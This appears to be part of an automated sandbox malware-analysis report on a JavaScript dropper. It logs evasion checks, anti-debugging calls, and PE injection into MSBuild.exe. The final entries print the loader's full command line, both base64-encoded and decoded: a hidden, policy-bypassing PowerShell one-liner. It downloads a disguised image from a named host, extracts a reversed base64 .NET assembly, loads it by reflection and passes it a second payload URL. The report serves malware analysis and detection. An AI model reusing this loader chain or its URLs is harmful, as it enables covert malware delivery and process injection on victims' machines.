                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Delayed program exit found
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040E54F Sleep,ExitProcess,10_2_0040E54F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,10_2_004198C2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1595Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1725Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5575Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4199Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5651Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3836Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: foregroundWindowGot 1768Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_10-53841
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 9.6 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6300Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6512Thread sleep count: 5575 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516Thread sleep count: 4199 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6580Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7128Thread sleep count: 188 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7128Thread sleep time: -94000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6956Thread sleep count: 5651 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6956Thread sleep time: -16953000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6956Thread sleep count: 3836 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6956Thread sleep time: -11508000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0040B335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,10_2_0041B42F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0040B53A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0044D5E9 FindFirstFileExA,10_2_0044D5E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,10_2_004089A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00406AC2 FindFirstFileW,FindNextFileW,10_2_00406AC2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,10_2_00407A8C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,10_2_00418C69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,10_2_00408DA7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_10006580 FindFirstFileExA,10_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,10_2_00406F06
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00418981 memset,GetSystemInfo,11_2_00418981
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: wscript.exe, 00000000.00000003.2992022759.00000137F149C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991947390.00000137F1481000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993556266.00000137F14A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                      Source: wscript.exe, 00000000.00000003.2992022759.00000137F149C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991947390.00000137F1481000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993556266.00000137F14A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993715210.00000137F3352000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3635314112.0000000000F69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: bhvFC84.tmp.11.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_10-54374
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0043A65D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,10_2_0041BCE3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00442554 mov eax, dword ptr fs:[00000030h]10_2_00442554
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_10004AB4 mov eax, dword ptr fs:[00000030h]10_2_10004AB4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00410B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,10_2_00410B19
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00434168
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0043A65D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00433B44
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00433CD7 SetUnhandledExceptionFilter,10_2_00433CD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_100060E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_10002639
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_10002B1C

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\wscript.exeNetwork Connect: 151.101.193.137 443Jump to behavior
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: amsi64_6372.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
                      Bypasses PowerShell execution policy
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQB
                      Contains functionality to inject code into remote processes
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,10_2_00417245
                      Injects a PE file into a foreign processes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and writeJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B3C008Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe10_2_00410F36
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00418754 mouse_event,10_2_00418754
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.jsJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
